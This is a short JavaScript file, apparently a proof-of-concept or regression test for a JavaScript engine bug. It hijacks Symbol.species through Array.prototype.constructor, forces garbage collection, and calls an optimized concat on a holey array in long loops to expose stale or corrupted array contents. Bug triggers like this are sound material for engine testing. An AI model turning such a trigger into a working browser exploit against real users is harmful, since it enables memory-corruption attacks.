function optNewArrayAndConcat() { let a = [,,,,,,,,,]; return Array.prototype.concat.apply(a); } function main() { Array.prototype.constructor = { [Symbol.species]: function () { return [{}]; } }; gc(); for (let i = 0; i < 0x10000; i++) { optNewArrayAndConcat().fill({}); } gc(); for (let i = 0; i < 0x20000; i++) { let res = optNewArrayAndConcat(); if (res[0]) print(res.toString()); } } main();